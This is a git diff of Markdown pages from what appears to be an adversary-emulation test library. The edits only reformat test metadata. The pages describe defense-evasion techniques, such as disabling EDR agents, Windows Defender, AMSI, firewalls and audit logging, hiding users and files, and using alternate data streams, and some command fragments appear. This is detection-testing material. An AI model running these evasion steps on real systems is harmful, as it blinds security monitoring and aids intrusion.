## Atomic Test #6 - Data Compressed - nix - gzip Single File - -auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** cde3c2af-3485-49eb-9c1f-0ed60e9cc0af + + + #### Inputs: @@ -319,13 +331,15 @@ rm -f #{input_file}.gz
## Atomic Test #7 - Data Compressed - nix - tar Folder or File - -auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 7af2b51e-ad1c-498c-aca8-d3290c19535a + + + #### Inputs: @@ -367,13 +381,15 @@ echo Please set input_file_folder argument to a folder that exists
## Atomic Test #8 - Data Encrypted with zip and gpg symmetric - -auto_generated_guid: 0286eb44-e7ce-41a0-b109-3da516e05a5f - Encrypt data for exiltration + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 0286eb44-e7ce-41a0-b109-3da516e05a5f + + + #### Inputs: diff --git a/atomics/T1560.002/T1560.002.md b/atomics/T1560.002/T1560.002.md index 8cd45ba7..4f4895dc 100644 --- a/atomics/T1560.002/T1560.002.md +++ b/atomics/T1560.002/T1560.002.md @@ -18,13 +18,15 @@ Some archival libraries are preinstalled on systems, such as bzip2 on macOS and
## Atomic Test #1 - Compressing data using GZip in Python (Linux) - -auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 - Uses GZip from Python to compress files + **Supported Platforms:** Linux +**auto_generated_guid:** 391f5298-b12d-4636-8482-35d9c17d53a8 + + + #### Inputs: @@ -66,13 +68,15 @@ which_python=`which python`; $which_python -V
## Atomic Test #2 - Compressing data using bz2 in Python (Linux) - -auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d - Uses bz2 from Python to compress files + **Supported Platforms:** Linux +**auto_generated_guid:** c75612b2-9de0-4d7c-879c-10d7b077072d + + + #### Inputs: @@ -114,13 +118,15 @@ which_python=`which python`; $which_python -V
## Atomic Test #3 - Compressing data using zipfile in Python (Linux) - -auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0 - Uses zipfile from Python to compress files + **Supported Platforms:** Linux +**auto_generated_guid:** 001a042b-859f-44d9-bf81-fd1c4e2200b0 + + + #### Inputs: @@ -162,13 +168,15 @@ which_python=`which python`; $which_python -V
## Atomic Test #4 - Compressing data using tarfile in Python (Linux) - -auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db - Uses tarfile from Python to compress files + **Supported Platforms:** Linux +**auto_generated_guid:** e86f1b4b-fcc1-4a2a-ae10-b49da01458db + + + #### Inputs: diff --git a/atomics/T1560/T1560.md b/atomics/T1560/T1560.md index 7c1e6f91..2200cf0c 100644 --- a/atomics/T1560/T1560.md +++ b/atomics/T1560/T1560.md @@ -12,14 +12,16 @@ Both compression and encryption are done prior to exfiltration, and can be perfo
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell - -auto_generated_guid: 41410c60-614d-4b9d-b66e-b0192dd9c597 - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1560-data-ps.zip in the $env:USERPROFILE directory + **Supported Platforms:** Windows +**auto_generated_guid:** 41410c60-614d-4b9d-b66e-b0192dd9c597 + + + #### Inputs: diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md index 4681b94f..ba2e2af9 100644 --- a/atomics/T1562.001/T1562.001.md +++ b/atomics/T1562.001/T1562.001.md @@ -56,13 +56,15 @@
## Atomic Test #1 - Disable syslog - -auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 - Disables syslog collection + **Supported Platforms:** Linux +**auto_generated_guid:** 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 + + + #### Inputs: @@ -106,13 +108,15 @@ sudo #{package_installer}
## Atomic Test #2 - Disable Cb Response - -auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 - Disable the Cb Response service + **Supported Platforms:** Linux +**auto_generated_guid:** ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 + + + @@ -139,13 +143,15 @@ fi
## Atomic Test #3 - Disable SELinux - -auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 - Disables SELinux enforcement + **Supported Platforms:** Linux +**auto_generated_guid:** fc225f36-9279-4c39-b3f9-5141ab74f8d8 + + + @@ -169,13 +175,15 @@ setenforce 1
## Atomic Test #4 - Stop Crowdstrike Falcon on Linux - -auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d - Stop and disable Crowdstrike Falcon on Linux + **Supported Platforms:** Linux +**auto_generated_guid:** 828a1278-81cc-4802-96ab-188bf29ca77d + + + @@ -201,13 +209,15 @@ sudo systemctl start falcon-sensor.service
## Atomic Test #5 - Disable Carbon Black Response - -auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c - Disables Carbon Black Response + **Supported Platforms:** macOS +**auto_generated_guid:** 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c + + + @@ -233,13 +243,15 @@ sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.pli
## Atomic Test #6 - Disable LittleSnitch - -auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 - Disables LittleSnitch + **Supported Platforms:** macOS +**auto_generated_guid:** 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 + + + @@ -263,13 +275,15 @@ sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
## Atomic Test #7 - Disable OpenDNS Umbrella - -auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 - Disables OpenDNS Umbrella + **Supported Platforms:** macOS +**auto_generated_guid:** 07f43b33-1e15-4e99-be70-bc094157c849 + + + @@ -293,13 +307,15 @@ sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfi
## Atomic Test #8 - Disable macOS Gatekeeper - -auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 - Disables macOS Gatekeeper + **Supported Platforms:** macOS +**auto_generated_guid:** 2a821573-fb3f-4e71-92c3-daac7432f053 + + + @@ -323,13 +339,15 @@ sudo spctl --master-enable
## Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS - -auto_generated_guid: b3e7510c-2d4c-4249-a33f-591a2bc83eef - Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS + **Supported Platforms:** macOS +**auto_generated_guid:** b3e7510c-2d4c-4249-a33f-591a2bc83eef + + + #### Inputs: @@ -361,14 +379,16 @@ sudo launchctl load -w #{userdaemon_plist}
## Atomic Test #10 - Unload Sysmon Filter Driver - -auto_generated_guid: 811b3e76-c41b-430c-ac0d-e2380bfaa164 - Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded". + **Supported Platforms:** Windows +**auto_generated_guid:** 811b3e76-c41b-430c-ac0d-e2380bfaa164 + + + #### Inputs: @@ -434,13 +454,15 @@ sysmon -accepteula -i
## Atomic Test #11 - Uninstall Sysmon - -auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc - Uninstall Sysinternals Sysmon for Defense Evasion + **Supported Platforms:** Windows +**auto_generated_guid:** a316fb2e-5344-470d-91c1-23e15c374edc + + + #### Inputs: @@ -494,16 +516,18 @@ cmd /c sysmon -i -accepteula
## Atomic Test #12 - AMSI Bypass - AMSI InitFailed - -auto_generated_guid: 695eed40-e949-40e5-b306-b4031e4154bd - Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ + **Supported Platforms:** Windows +**auto_generated_guid:** 695eed40-e949-40e5-b306-b4031e4154bd + + + @@ -527,15 +551,17 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
## Atomic Test #13 - AMSI Bypass - Remove AMSI Provider Reg Key - -auto_generated_guid: 13f09b91-c953-438e-845b-b585e51cac9b - With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone. + **Supported Platforms:** Windows +**auto_generated_guid:** 13f09b91-c953-438e-845b-b585e51cac9b + + + @@ -559,15 +585,17 @@ New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4
## Atomic Test #14 - Disable Arbitrary Security Windows Service - -auto_generated_guid: a1230893-56ac-4c81-b644-2108e982f8f5 - With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService" + **Supported Platforms:** Windows +**auto_generated_guid:** a1230893-56ac-4c81-b644-2108e982f8f5 + + + #### Inputs: @@ -598,14 +626,16 @@ net.exe start #{service_name} >nul 2>&1
## Atomic Test #15 - Tamper with Windows Defender ATP PowerShell - -auto_generated_guid: 6b8df440-51ec-4d53-bf83-899591c9b5d7 - Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings. + **Supported Platforms:** Windows +**auto_generated_guid:** 6b8df440-51ec-4d53-bf83-899591c9b5d7 + + + @@ -635,15 +665,17 @@ Set-MpPreference -DisableBlockAtFirstSeen 0
## Atomic Test #16 - Tamper with Windows Defender Command Prompt - -auto_generated_guid: aa875ed4-8935-47e2-b2c5-6ec00ab220d2 - Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** aa875ed4-8935-47e2-b2c5-6ec00ab220d2 + + + @@ -670,14 +702,16 @@ sc config WinDefend start=enabled >nul 2>&1
## Atomic Test #17 - Tamper with Windows Defender Registry - -auto_generated_guid: 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 - Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info. + **Supported Platforms:** Windows +**auto_generated_guid:** 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 + + + @@ -701,17 +735,19 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
## Atomic Test #18 - Disable Microsoft Office Security Features - -auto_generated_guid: 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 - Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ + **Supported Platforms:** Windows +**auto_generated_guid:** 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 + + + @@ -742,17 +778,19 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Protected
## Atomic Test #19 - Remove Windows Defender Definition Files - -auto_generated_guid: 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 - Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ + **Supported Platforms:** Windows +**auto_generated_guid:** 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 + + + @@ -772,13 +810,15 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
## Atomic Test #20 - Stop and Remove Arbitrary Security Windows Service - -auto_generated_guid: ae753dda-0f15-4af6-a168-b9ba16143143 - Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database. + **Supported Platforms:** Windows +**auto_generated_guid:** ae753dda-0f15-4af6-a168-b9ba16143143 + + + #### Inputs: @@ -804,13 +844,15 @@ Remove-Service -Name #{service_name}
## Atomic Test #21 - Uninstall Crowdstrike Falcon on Windows - -auto_generated_guid: b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 - Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller. + **Supported Platforms:** Windows +**auto_generated_guid:** b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 + + + #### Inputs: @@ -835,15 +877,17 @@ if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet
## Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Folder - -auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed - Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath + **Supported Platforms:** Windows +**auto_generated_guid:** 0b19f4ee-de90-4059-88cb-63c800c683ed + + + #### Inputs: @@ -874,15 +918,17 @@ Remove-MpPreference -ExclusionPath $excludedpath
## Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Extension - -auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea - Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension. + **Supported Platforms:** Windows +**auto_generated_guid:** 315f4be6-2240-4552-b3e1-d1047f5eecea + + + #### Inputs: @@ -913,15 +959,17 @@ Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore
## Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process - -auto_generated_guid: a123ce6a-3916-45d6-ba9c-7d4081315c27 - Malware can exclude specific processes from being scanned and evading detection. Upon successful execution, the process(es) should be on the list of excluded processes. To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess." + **Supported Platforms:** Windows +**auto_generated_guid:** a123ce6a-3916-45d6-ba9c-7d4081315c27 + + + #### Inputs: diff --git a/atomics/T1562.002/T1562.002.md b/atomics/T1562.002/T1562.002.md index 01ba57e2..213de5a4 100644 --- a/atomics/T1562.002/T1562.002.md +++ b/atomics/T1562.002/T1562.002.md @@ -18,16 +18,18 @@ Adversaries may targeting system-wide logging or just that of a particular appli
## Atomic Test #1 - Disable Windows IIS HTTP Logging - -auto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db - Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. Use the cleanup commands to restore some default auditpol settings (your original settings will be lost) + **Supported Platforms:** Windows +**auto_generated_guid:** 69435dcf-c66f-4ec0-a8b1-82beb76b34db + + + #### Inputs: @@ -58,13 +60,15 @@ if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
## Atomic Test #2 - Kill Event Log Service Threads - -auto_generated_guid: 41ac52ba-5d5e-40c0-b267-573ed90489bd - Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html + **Supported Platforms:** Windows +**auto_generated_guid:** 41ac52ba-5d5e-40c0-b267-573ed90489bd + + + @@ -96,14 +100,16 @@ Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
## Atomic Test #3 - Impair Windows Audit Log Policy - -auto_generated_guid: 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 - Disables the windows audit policy to prevent key host based telemetry being written into the event logs. [Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/) + **Supported Platforms:** Windows +**auto_generated_guid:** 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 + + + @@ -131,13 +137,15 @@ auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
## Atomic Test #4 - Clear Windows Audit Policy Config - -auto_generated_guid: 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 - Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log. + **Supported Platforms:** Windows +**auto_generated_guid:** 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 + + + diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1562.003/T1562.003.md index 6a66d737..d081df79 100644 --- a/atomics/T1562.003/T1562.003.md +++ b/atomics/T1562.003/T1562.003.md @@ -18,13 +18,15 @@ On Windows systems, the PSReadLine module tracks commands used in a
## Atomic Test #1 - Disable history collection - -auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 - Disables history collection in shells + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 + + + #### Inputs: @@ -50,16 +52,18 @@ export HISTCONTROL=ignoreboth
## Atomic Test #2 - Mac HISTCONTROL - -auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d - The HISTCONTROL variable is set to ignore (not write to the history file) command that are a duplicate of something already in the history and commands that start with a space. This atomic sets this variable in the current session and also writes it to the current user's ~/.bash_profile so that it will apply to all future settings as well. https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 468566d5-83e5-40c1-b338-511e1659628d + + + #### Run it with these steps! diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md index f9e8b9f6..27d556d3 100644 --- a/atomics/T1562.004/T1562.004.md +++ b/atomics/T1562.004/T1562.004.md @@ -24,13 +24,15 @@ Modifying or disabling a system firewall may enable adversary C2 communications,
## Atomic Test #1 - Disable firewall - -auto_generated_guid: 80f5e701-f7a4-4d06-b140-26c8efd1b6b4 - Disables the firewall + **Supported Platforms:** Linux +**auto_generated_guid:** 80f5e701-f7a4-4d06-b140-26c8efd1b6b4 + + + #### Inputs: @@ -60,14 +62,16 @@ Disables the firewall
## Atomic Test #2 - Disable Microsoft Defender Firewall - -auto_generated_guid: 88d05800-a5e4-407e-9b53-ece4174f197f - Disables the Microsoft Defender Firewall for the current profile. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + **Supported Platforms:** Windows +**auto_generated_guid:** 88d05800-a5e4-407e-9b53-ece4174f197f + + + @@ -91,14 +95,16 @@ netsh advfirewall set currentprofile state on >nul 2>&1
## Atomic Test #3 - Disable Microsoft Defender Firewall via Registry - -auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 - Disables the Microsoft Defender Firewall for the public profile via registry Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + **Supported Platforms:** Windows +**auto_generated_guid:** afedc8c4-038c-4d82-b3e5-623a95f8a612 + + + @@ -122,14 +128,16 @@ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Param
## Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall - -auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 - Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services... + **Supported Platforms:** Windows +**auto_generated_guid:** d9841bf8-f161-4c73-81e9-fd773a5ff8c1 + + + @@ -154,15 +162,17 @@ netsh advfirewall reset >nul 2>&1
## Atomic Test #5 - Opening ports for proxy - HARDRAIN - -auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 - This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying. reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf + **Supported Platforms:** Windows +**auto_generated_guid:** 15e57006-79dd-46df-9bf9-31bc24fb5a80 + + + @@ -186,13 +196,15 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp
## Atomic Test #6 - Open a local port through Windows Firewall to any profile - -auto_generated_guid: 9636dd6e-7599-40d2-8eee-ac16434f35ed - This test will attempt to open a local port defined by input arguments to any profile + **Supported Platforms:** Windows +**auto_generated_guid:** 9636dd6e-7599-40d2-8eee-ac16434f35ed + + + #### Inputs: @@ -221,13 +233,15 @@ netsh advfirewall firewall delete rule name="Open Port to Any" | Out-Null
## Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location - -auto_generated_guid: 6f5822d2-d38d-4f48-9bfc-916607ff6b8c - This test will attempt to allow an executable through the system firewall located in the Users directory + **Supported Platforms:** Windows +**auto_generated_guid:** 6f5822d2-d38d-4f48-9bfc-916607ff6b8c + + + #### Inputs: diff --git a/atomics/T1562.006/T1562.006.md b/atomics/T1562.006/T1562.006.md index c4da8863..1db3c799 100644 --- a/atomics/T1562.006/T1562.006.md +++ b/atomics/T1562.006/T1562.006.md @@ -16,13 +16,15 @@ In the case of network-based reporting of indicators, an adversary may block tra
## Atomic Test #1 - Auditing Configuration Changes on Linux Host - -auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 - Emulates modification of auditd configuration files + **Supported Platforms:** Linux +**auto_generated_guid:** 212cfbcf-4770-4980-bc21-303e37abd0e3 + + + #### Inputs: @@ -63,13 +65,15 @@ sed -i '$ d' /etc/#{libaudit_config_file_name}
## Atomic Test #2 - Logging Configuration Changes on Linux Host - -auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c - Emulates modification of syslog configuration. + **Supported Platforms:** Linux +**auto_generated_guid:** 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c + + + #### Inputs: diff --git a/atomics/T1563.002/T1563.002.md b/atomics/T1563.002/T1563.002.md index 766f1007..51534980 100644 --- a/atomics/T1563.002/T1563.002.md +++ b/atomics/T1563.002/T1563.002.md @@ -12,13 +12,15 @@ Adversaries may perform RDP session hijacking which involves stealing a legitima
## Atomic Test #1 - RDP hijacking - -auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46 - [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization + **Supported Platforms:** Windows +**auto_generated_guid:** a37ac520-b911-458e-8aed-c5f1576d9f46 + + + #### Inputs: diff --git a/atomics/T1564.001/T1564.001.md b/atomics/T1564.001/T1564.001.md index 33358e45..35dbb5bc 100644 --- a/atomics/T1564.001/T1564.001.md +++ b/atomics/T1564.001/T1564.001.md @@ -28,13 +28,15 @@ Adversaries can use this to their advantage to hide files and folders anywhere o
## Atomic Test #1 - Create a hidden file in a hidden directory - -auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be - Creates a hidden file inside a hidden directory + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be + + + @@ -59,13 +61,15 @@ rm -rf /var/tmp/.hidden-directory/
## Atomic Test #2 - Mac Hidden file - -auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 - Hide a file on MacOS + **Supported Platforms:** macOS +**auto_generated_guid:** cddb9098-3b47-4e01-9d3b-6f5f323288a9 + + + @@ -85,14 +89,16 @@ xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF
## Atomic Test #3 - Create Windows System File with Attrib - -auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32 - Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details and observe that the Attributes are "SA" for System and Archive. + **Supported Platforms:** Windows +**auto_generated_guid:** f70974c8-c094-4574-b542-2c545af95a32 + + + #### Inputs: @@ -133,14 +139,16 @@ echo system_Attrib_T1564.001 >> #{file_to_modify}
## Atomic Test #4 - Create Windows Hidden File with Attrib - -auto_generated_guid: dadb792e-4358-4d8d-9207-b771faa0daa5 - Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file and observe that the Attributes are "SH" for System and Hidden. + **Supported Platforms:** Windows +**auto_generated_guid:** dadb792e-4358-4d8d-9207-b771faa0daa5 + + + #### Inputs: @@ -181,13 +189,15 @@ echo system_Attrib_T1564.001 >> #{file_to_modify}
## Atomic Test #5 - Hidden files - -auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 - Requires Apple Dev Tools + **Supported Platforms:** macOS +**auto_generated_guid:** 3b7015f2-3144-4205-b799-b05580621379 + + + #### Inputs: @@ -212,13 +222,15 @@ setfile -a V #{filename}
## Atomic Test #6 - Hide a Directory - -auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 - Hide a directory on MacOS + **Supported Platforms:** macOS +**auto_generated_guid:** b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 + + + @@ -243,13 +255,15 @@ rm /var/tmp/T1564.001_mac.txt
## Atomic Test #7 - Show all hidden files - -auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c - Show all hidden files on MacOS + **Supported Platforms:** macOS +**auto_generated_guid:** 9a1ec7da-b892-449f-ad68-67066d04380c + + + diff --git a/atomics/T1564.002/T1564.002.md b/atomics/T1564.002/T1564.002.md index eb504c9a..766c53ee 100644 --- a/atomics/T1564.002/T1564.002.md +++ b/atomics/T1564.002/T1564.002.md @@ -14,13 +14,15 @@ There is a property value in /Library/Preferences/com.apple.loginwindow ## Atomic Test #1 - Create Hidden User using UniqueID < 500 - -auto_generated_guid: 4238a7f0-a980-4fff-98a2-dfc0a363d507 - Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) + **Supported Platforms:** macOS +**auto_generated_guid:** 4238a7f0-a980-4fff-98a2-dfc0a363d507 + + + #### Inputs: @@ -49,13 +51,15 @@ sudo dscl . -delete /Users/#{user_name}
## Atomic Test #2 - Create Hidden User using IsHidden option - -auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 - Add a hidden user on macOS using IsHidden optoin + **Supported Platforms:** macOS +**auto_generated_guid:** de87ed7b-52c3-43fd-9554-730f695e7f31 + + + #### Inputs: diff --git a/atomics/T1564.003/T1564.003.md b/atomics/T1564.003/T1564.003.md index a554980d..cdc08590 100644 --- a/atomics/T1564.003/T1564.003.md +++ b/atomics/T1564.003/T1564.003.md @@ -16,14 +16,16 @@ Adversaries may abuse these functionalities to hide otherwise visible windows fr
## Atomic Test #1 - Hidden Window - -auto_generated_guid: f151ee37-9e2b-47e6-80e4-550b9f999b7a - Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden. Upon execution a hidden PowerShell window will launch calc.exe + **Supported Platforms:** Windows +**auto_generated_guid:** f151ee37-9e2b-47e6-80e4-550b9f999b7a + + + #### Inputs: diff --git a/atomics/T1564.004/T1564.004.md b/atomics/T1564.004/T1564.004.md index 1a314f8c..6ad1f5eb 100644 --- a/atomics/T1564.004/T1564.004.md +++ b/atomics/T1564.004/T1564.004.md @@ -18,17 +18,19 @@ Adversaries may store malicious data or binaries in file attribute metadata inst
## Atomic Test #1 - Alternate Data Streams (ADS) - -auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f4602364f4 - Execute from Alternate Streams [Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f) [Reference - 2](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/) + **Supported Platforms:** Windows +**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-49f4602364f4 + + + #### Inputs: @@ -62,14 +64,16 @@ esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
## Atomic Test #2 - Store file in Alternate Data Stream (ADS) - -auto_generated_guid: 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 - Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test + **Supported Platforms:** Windows +**auto_generated_guid:** 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 + + + #### Inputs: @@ -103,14 +107,16 @@ Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
## Atomic Test #3 - Create ADS command prompt - -auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb - Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp% folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1564.004_has_ads.txt:adstest.txt" + **Supported Platforms:** Windows +**auto_generated_guid:** 17e7637a-ddaf-4a82-8622-377e20de8fdb + + + #### Inputs: @@ -141,14 +147,16 @@ del #{file_name} >nul 2>&1
